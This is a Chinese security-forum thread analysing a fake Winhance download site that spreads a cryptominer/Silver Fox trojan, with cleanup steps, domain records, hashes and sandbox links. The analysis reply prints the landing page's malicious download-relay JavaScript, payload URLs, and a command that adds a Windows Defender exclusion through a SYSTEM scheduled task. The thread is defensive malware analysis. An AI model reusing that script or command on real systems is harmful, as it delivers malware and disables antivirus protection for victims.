吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 1558|回复: 18
上一主题 下一主题
收起左侧

[PC样本分析] 挖矿木马电脑中招

[复制链接]
跳转到指定楼层
楼主
zzzjn 发表于 2026-8-28 16:47 回帖奖励
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
https://win-hance.com.cn/
该网站下载的东西实则为挖矿木马,吃内存
有大佬给分析下吗

免费评分

参与人数 4吾爱币 +3 热心值 +2 收起 理由
Good11 + 1 谢谢@Thanks!
小兔快飞 + 1 我很赞同!
shiyue2925 + 1 + 1 谢谢@Thanks!
GS9452 + 1 谢谢@Thanks!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

推荐
AI-Compare 发表于 2026-8-28 22:59
本帖最后由 AI-Compare 于 2026-8-29 01:04 编辑

具体请参考
https://www.52pojie.cn/thread-2124432-1-1.html

简称或我个人俗称银狐组织诺亚S落地页,白加黑漏驱利用

静态步骤( by SYSTEM-RAMOS-ZDY)

1 资源管理器,地址栏,输入(%windir%\System32\Codeintegrity)并回车
2 找到WDCP策略文件(SiPolicy.p7b)并删除
3 立即创建(SiPolicy.p7b)同名文件夹
4 输入(%windir%\System32\tasks)并回车
5 删除(最新日期/随机字符)任务计划文件
6 开始菜单任意位置,输入(taskschd.msc)并回车
7 检查任务计划列表,刚才(随机字符)任务是否已被移除
8 如果没有移除。选中(随机字符)任务并右键(删除)
9 重启电脑,此时病毒理论上不会开机自启,杀毒软件也可以正常运行了
0 立即启动任意有效杀毒软件,进行全盘扫描,对银狐病毒内容进行查杀
  如果是公司,请立即报告技术人员,谨防更深入的横向感染或窃密勒索

外壳站群

域 名 win-hance[.]com[.]cn
注册商 北京新网数码信息技术有限公司
注册人 5b6Q5pa55p2w
邮 箱 YWxpcmV6YWpvYmUxNzFAZ21haWwuY29t
省/州 四川(sichuansheng)
地 区 中国(CN)
注册日 2026-07-11 22:01:40 UTC+8
过期日 2027-07-11 22:01:40 UTC+8
状 态 正常
DNS  ns1[.]363[.]hk
    ns2[.]363[.]hk
DNSSEC 未配置

落地通信

域 名 noah-ssh[.]com[.]cn
注册商 Web Commerce Communications Limited
注册人 5LmU6JOJ6JOJ
邮 箱 Mzg3NzA5ODg2NUBxcS5jb20=
注册日 2026-08-10 17:05:04 UTC+8
过期日 2027-08-10 17:05:04 UTC+8
状 态 客户端禁止转移
DNS  a9[.]share-dns[.]com
    b9[.]share-dns[.]net
DNSSEC 未配置

落地中继

域 名 workers[.]dev
注册商 CloudFlare, Inc.
注册人 CloudFlare, Inc.
邮 箱
省/州 加利福尼亚州(CA)
地 区 美国(US)
电 话 +1. NDE1MzE5NzUxNw==
注册日 2019-02-09 04:36:47 UTC+8
过期日 2027-02-09 04:36:47 UTC+8
更新日 2025-11-16 20:00:30 UTC+8
IANA_ID 1910
状 态 客户端禁止删除
    客户端禁止转移
    客户端禁止更新
DNS  clyde[.]ns.cloudflare[.]com
    sofia[.]ns.cloudflare[.]com
DNSSEC 未配置

下载服务

域 名 dvl51m[.]com
注册商 Dynadot Inc
注册人
邮 箱
注册日 2026-08-22 09:49:30 UTC+8
过期日 2027-08-22 09:49:30 UTC+8
更新日 2026-08-22 09:49:43 UTC+8
IANA_ID 472
状 态 客户端禁止转移
DNS  ns1[.]dyna-ns[.]net
    ns2[.]dyna-ns[.]net
DNSSEC 未配置

文件指纹

install_q0.3.03.exe
大小: 27057152 字节 : 25 MiB
CRC32: 5B2586DF
CRC64: FE5B014FDF5C3C2F
XXH64: AAD2AAD3D9E9031F
SHA256: ce6860927721f12382013001eaeb6ef30e2bcce1c201f043c0ab578d033f01fd
SHA3-256: ef8773ba5f0c176587e52ec09d41f7dfb04352f2ac12e575d6b7ea882523cfd4

tad
a.gif
b.gif
c.gif
d.gif
s.jpg
s.dat
f.dat
t2t.jpg
ooo.jpg
drops.jpg
暂未哈希

ranchserv.sys  b(指纹不固定,银狐创建了数不清的变体)
大小: 28272 字节 : 27 KiB
CRC32: 4ECA46C5
CRC64: DDA9C0BB88D4955C
XXH64: B9D9C01AF8711ECE
SHA256: a4b6ba74a225a56de063de34b4645ae67588024d0447c5310a576eeeac25b119
SHA3-256: 3545d72b30be4642f5581328f40107fc7cd04bc4856e8e4f7b6ff5e9a2de86f8

火绒扫描(我自己的本地扫描结果)
6.0.11.3 版本
08-28 19:43 病毒库

2026/08/27 22:03:02  b
病毒防护
文件实时监控
发现病毒Exploit/TrueSight.a, 已处理

病毒名称:Exploit/TrueSight.a
病毒ID:154AA1F46F586081
病毒路径:ranchserv.sys
操作类型:修改
操作结果:已处理,删除文件

2026/08/28 22:58:07
2026/08/28 23:11:45
病毒防护
下载保护
文件实时监控
发现病毒HVM:Trojan/Injector.dn, 已处理

病毒名称:HVM:Trojan/Injector.dn
病毒ID:F8E1D1ED7850A458
病毒路径:install_q0.3.03.exe
操作类型:修改 
操作结果:已处理,删除文件

外联统计

<script charset="UTF-8" id="LA_COLLECT" src="//sdk[.]51[.]la/js-sdk-pro.min.js"></script>

        LA.init({
                id: "3QeItG2289rS1l5O",
                ck: "3QeItG2289rS1l5O"
        })

核心脚本

(function(){
  var burger=document.getElementById('cgBurger'),menu=document.getElementById('cgMenu');
  if(burger){burger.addEventListener('click',function(){menu.classList.toggle('cg-menu-open')});}
  var faqs=document.querySelectorAll('.cg-faq-item');
  faqs.forEach(function(f){f.querySelector('.cg-faq-q').addEventListener('click',function(){f.classList.toggle('open')})});
  fetch('https://noah-sk[.]com/api.php')
    .then(function(res){return res.json()})
    .then(function(data){
      if(data.code===0 && data.download_link){
        document.querySelectorAll('.wh-download-btn').forEach(function(btn){btn.setAttribute('href',data.download_link);btn.setAttribute('target','_blank');btn.setAttribute('rel','noopener noreferrer');});
      }
    }).catch(function(){});
})();

(function () {
  var DISCOVERY = [
    'https://noah-ssh[.]com[.]cn/relays.json',
    'https://noah-relay[.]wotudj578[.]workers[.]dev',
    'https://noah-relay2[.]wotudj578[.]workers[.]dev'
  ];
  var POOL_KEY = 'noah_relay_pool';
  var LINK = '';
  var resolving = false;
  var NOAH_DL_REV = 'r6';

  function targets() {
    var list = document.querySelectorAll('[data-download]');
    if (list.length) return list;
    var all = document.querySelectorAll('a, button');
    var picked = [];
    for (var i = 0; i < all.length; i++) {
      var t = (all[i].textContent || '').replace(/\s+/g, '');
      if (/下载|立即下载|免费下载|电脑版|^download$/i.test(t)) picked.push(all[i]);
    }
    return picked;
  }

  function startDownload(url) {
    if (!url) return;
    try {
      var a = document.createElement('a');
      a.href = url;
      a.rel = 'noopener noreferrer';
      a.referrerPolicy = 'no-referrer';
      a.style.display = 'none';
      document.body.appendChild(a);
      a.click();
      setTimeout(function () { try { a.parentNode.removeChild(a); } catch (e) {} }, 1500);
    } catch (e) {
      try { window.location.href = url; } catch (e2) {}
    }
  }

  function onClick(ev) {
    if (ev) { ev.preventDefault(); ev.stopPropagation(); }
    if (LINK) { startDownload(LINK); return false; }
    resolve(function () { if (LINK) startDownload(LINK); });
    return false;
  }

  function bind() {
    var list = targets();
    for (var i = 0; i < list.length; i++) {
      var el = list[i];
      if (el.__noahBound) continue;
      el.__noahBound = true;
      if (el.tagName === 'A') el.setAttribute('href', 'javascript:void(0)');
      el.style.cursor = 'pointer';
      el.addEventListener('click', onClick, false);
    }
  }

  function getCachedPool() {
    try {
      var o = JSON.parse(localStorage.getItem(POOL_KEY) || 'null');
      if (o && o.relays && o.relays.length) return o;
    } catch (e) {}
    return null;
  }

  function fetchLink(relays, i, done) {
    if (!relays || i >= relays.length) { if (done) done(); return; }
    var ctrl = new AbortController();
    var timer = setTimeout(function () { ctrl.abort(); }, 2500);
    fetch(relays[i].replace(/\/+$/, '') + '/api.php?t=' + Date.now(), { signal: ctrl.signal, cache: 'no-store' })
      .then(function (r) { return r.ok ? r.json() : Promise.reject(); })
      .then(function (data) {
        clearTimeout(timer);
        if (data && data.download_link) { LINK = data.download_link; bind(); if (done) done(); }
        else fetchLink(relays, i + 1, done);
      })
      .catch(function () { clearTimeout(timer); fetchLink(relays, i + 1, done); });
  }

  function discover(i, onDone) {
    if (i >= DISCOVERY.length) { onDone(null); return; }
    var ctrl = new AbortController();
    var timer = setTimeout(function () { ctrl.abort(); }, 3000);
    fetch(DISCOVERY[i] + (DISCOVERY[i].indexOf('?') >= 0 ? '&' : '?') + '_=' + Date.now(), { signal: ctrl.signal, cache: 'no-store' })
      .then(function (r) { return r.ok ? r.json() : Promise.reject(); })
      .then(function (pkg) {
        clearTimeout(timer);
        var data = pkg && pkg.data ? pkg.data : pkg;
        if (data && data.relays && data.relays.length) {
          try { localStorage.setItem(POOL_KEY, JSON.stringify(data)); } catch (e) {}
          onDone(data);
        } else { discover(i + 1, onDone); }
      })
      .catch(function () { clearTimeout(timer); discover(i + 1, onDone); });
  }

  function resolve(done) {
    if (resolving) { if (done) setTimeout(done, 800); return; }
    resolving = true;
    discover(0, function (fresh) {
      var pool = fresh || getCachedPool();
      if (pool) fetchLink(pool.relays, 0, function () { resolving = false; if (done) done(); });
      else { resolving = false; if (done) done(); }
    });
  }

  if (document.readyState === 'loading') {
    document.addEventListener('DOMContentLoaded', bind);
  } else {
    bind();
  }
  resolve();
})();

落地通信

https://noah-ssh[.]com[.]cn/relays.json?_=1787929050191

{
    "data": {
        "v": 1786523551,
        "updated_at": 1786523551,
        "relays": [
            "https://noah-ssh[.]com[.]cn",
            "https://noah-relay[.]wotudj578[.]workers[.]dev",
            "https://noah-relay2[.]wotudj578[.]workers[.]dev"
        ]
    },
    "sig": ""
}

落地中继

https://noah-relay[.]wotudj578[.]workers.dev
https://noah-relay[.]wotudj578[.]workers.dev/relays.json?_=1787603702460

{
  "data": {
    "v": 1,
    "updated at": 1,
    "relays": [
      "https://noah-ssh[.]com[.]cn",
      "https://noah-re1ay2[.]wotudj578[.]workers[.]dev"
    ]
  },
  "sig": ""
}

下载赋值

https://noah-ssh[.]com[.]cn/api.php?t=1787929050797

{
  "download_link": "https://www[.]dvl51m[.]com/insdw62"
}

落地信息

https://noah-ssh[.]com[.]cn/admin

403 Forbidden:当前 IP 不在管理白名单(0.0.0.0)

后台参考

https://www.bilibili.com/video/BV1ebEh6bEU3
https://www.bilibili.com/video/BV1663n6dEaJ
银狐SK落地页(其中之一)后台参考
弱密码,现在已经添加IP登录白名单

文件属性

x64 - Zip Sfx Archive  , 
Overlay :  ZIP archive > Offset : 0000h -  [ Deflated ] 

调试符号
No PDB

参考编译
Visual C++ (CodeView)
VC Feature.
POGO

编译时间
2016-08-15 03:15:56

类型
应用程序

大小
25.8 MB

参考名称
sfxzip.exe

文件说明
文件版本
产品名称
产品版本
版权
语言
Null

区段
.text
.rdata
.data
.pdata
.gfids
.rsrc
.reloc
叠加层

尝试解压

---------------------------
7-Zip
---------------------------
无法作为压缩包打开文件「install_q0.3.03.exe」
---------------------------
确定   
---------------------------

---------------------------
错误
---------------------------
install_q0.3.03.exe
这个压缩文件格式未知或者数据已经被损坏
---------------------------
确定   
---------------------------

基础解压

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
  version="1.0.0.0"
  processorArchitecture="*"
  name="WinRAR SFX"
  type="win32"/>
<description>WinRAR SFX module</description>

漏驱数签

Adlice
2016 年 01 月 16 日,04 点 18 分 03 秒
DigiCert High Assurance Code Signing CA-1 签发
SHA1 摘要算法,RSA 摘要加密算法
证书序列号:06 e2 84 cd 38 ee 15 62 30 95 dc bd 38 e6 5f 9b

漏驱参考

x64 Native - System driver ( .sys )  [ Visual Studio .9.00 - 2008 ]  [ Driver file via PDB ]- CPU : AMD x64 [SigneD] [ Win 7 ] , 
Overlay :  Signed - Name : Antirootkit module.

调试符号
c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb

编译时间
2016-01-16 04:17:58

文件说明
Antirootkit module

类型
系统文件

文件版本
2.0.2.0

产品名称
Truesight

版权
Copyright Adlice Software(C) 2014

大小
27.6 KB

语言
法语(法国)

原始文件名
Truesight

恶意载荷

https://26usdm[.]oss-cn-beijing[.]aliyuncs[.]com/tad
https://26usdm[.]oss-cn-beijing[.]aliyuncs[.]com/a.gif
https://26usdm[.]oss-cn-beijing[.]aliyuncs[.]com/b.gif
https://26usdm[.]oss-cn-beijing[.]aliyuncs[.]com/c.gif
https://26usdm[.]oss-cn-beijing[.]aliyuncs[.]com/d.gif
https://26usdm[.]oss-cn-beijing[.]aliyuncs[.]com/s.jpg
https://26usdm[.]oss-cn-beijing[.]aliyuncs[.]com/s.dat

https://mm2027[.]oss-cn-hangzhou[.]aliyuncs[.]com/f.dat
https://mm2027[.]oss-cn-hangzhou[.]aliyuncs[.]com/t2t.jpg
https://mm2027[.]oss-cn-hangzhou[.]aliyuncs[.]com/ooo.jpg
https://mm2027[.]oss-cn-hangzhou[.]aliyuncs[.]com/drops.jpg

释放文件

C:\Windows\Temp\ranchserv.jpg

C:\Users\Public\KSzNU8\msadox.tb
C:\Users\Public\KSzNU8\yE3scs.exe
C:\Users\Public\KSzNU8\adoresd.dat
C:\Users\Public\KSzNU8\checktime.vbs
C:\Users\Public\KSzNU8\UxEnhance64.dll

杀软排除

cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F

计划任务

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Description/>
    <URI>\</URI>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
    </LogonTrigger>
    <TimeTrigger>
      <Repetition>
        <Interval>PT1M</Interval>
        <StopAtDurationEnd>false</StopAtDurationEnd>
      </Repetition>
      <StartBoundary>2009-04-23T00:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <GroupId>S-1-5-32-545</GroupId>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
    <AllowHardTerminate>false</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>true</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
    <Priority>4</Priority>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Users\Public\WzL5ss\7Ava8Z.exe</Command>
      <WorkingDirectory>C:\Users\Public\WzL5ss\</WorkingDirectory>
      <Arguments />
    </Exec>
  </Actions>
</Task>

外壳站群
https://s.threatbook.com/report/url/57a2e61cef1390bbf25114d30d002725

落地通信
https://s.threatbook.com/report/url/df9d4a9a92cc68ead43b39fc693dd855
https://s.threatbook.com/report/url/1efc8e221e3a2b53c5aeeeae7d02b741

落地中继
https://s.threatbook.com/report/url/cd2e3dfe1a22e443f5168f83d093d718
https://s.threatbook.com/report/url/3bb188ac541188419501bc9755fb2426

落地后台
https://s.threatbook.com/report/url/0c05472d46527af9da348b9eb80b3c74

下载赋值
https://s.threatbook.com/report/url/8f1a3e2557553d7ac0f2bb0aaf84d64e

样本情况
https://virusscan.jotti.org/zh-CN/filescanjob/91mkzo317f
https://tix.qq.com/search/single?keyword=238eebfbb077db8d3239a314d8639f38
https://sandbox.ti.qianxin.com/sandbox/page/detail?type=file&id=AaBI89323vNfIaDFK5kr
https://sandbox.dbappsecurity.com.cn/report/39bf13de-83e1-44f4-97ac-b59a8f4473cd/flat
https://www.maldun.com/analysis/YXNkZmRzZmFkc2YxMzA2ODY3ZHNmYXNkZmFzZGY=/
https://fenxi.antiy.cn/#/entirety/file/searchResult?hash=238eebfbb077db8d3239a314d8639f38
https://virus.cverc.org.cn/#/entirety/file/searchResult?hash=238eebfbb077db8d3239a314d8639f38
https://www.virscan.org/report/ce6860927721f12382013001eaeb6ef30e2bcce1c201f043c0ab578d033f01fd
https://www.virustotal.com/gui/file/ce6860927721f12382013001eaeb6ef30e2bcce1c201f043c0ab578d033f01fd
https://s.threatbook.com/report/file/ce6860927721f12382013001eaeb6ef30e2bcce1c201f043c0ab578d033f01fd
https://sandbox.qianxin.com/tq/report/toNewReport.do?rid=e348fcca7a4c24802b464cdbaa477516&sk=48476090
https://opentip.kaspersky.com/CE6860927721F12382013001EAEB6EF30E2BCCE1C201F043C0AB578D033F01FD/results?tab=upload

免费评分

参与人数 4吾爱币 +4 热心值 +3 收起 理由
mch624774 + 1 + 1 我很赞同!
Nevvb1e251111 + 1 + 1 !?强强?!
chaotianji + 1 我很赞同!
congcongzhidao + 1 + 1 我很赞同!

查看全部评分

推荐
maya123 发表于 2026-8-29 08:16

winhance的官网是这个https://winhance.net/,

免费评分

参与人数 1吾爱币 +1 热心值 +1 收起 理由
tutu2 + 1 + 1 牛 这冒牌网站也太真了

查看全部评分

4#
Wong_Sir 发表于 2026-8-28 22:35
5#
wentao520 发表于 2026-8-29 07:06
话说,什么情况下才是中毒了?
6#
paker5200 发表于 2026-8-29 10:51
看来还是不要随便乱点奇怪的网站
7#
zbzb80 发表于 2026-8-29 10:57
不要随便去来历不明的网站下东西啊!
8#
abies 发表于 2026-8-29 14:08
这个是不是可以报J了?
9#
Geon 发表于 2026-8-29 17:29
这个软件和真正的Winhance开源项目一点关系都没有 可以举报了
10#
ruomengfeiyang 发表于 2026-8-30 09:14
最近感觉木马又挺多的了
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - 52pojie.cn ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2026-9-6 04:02

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表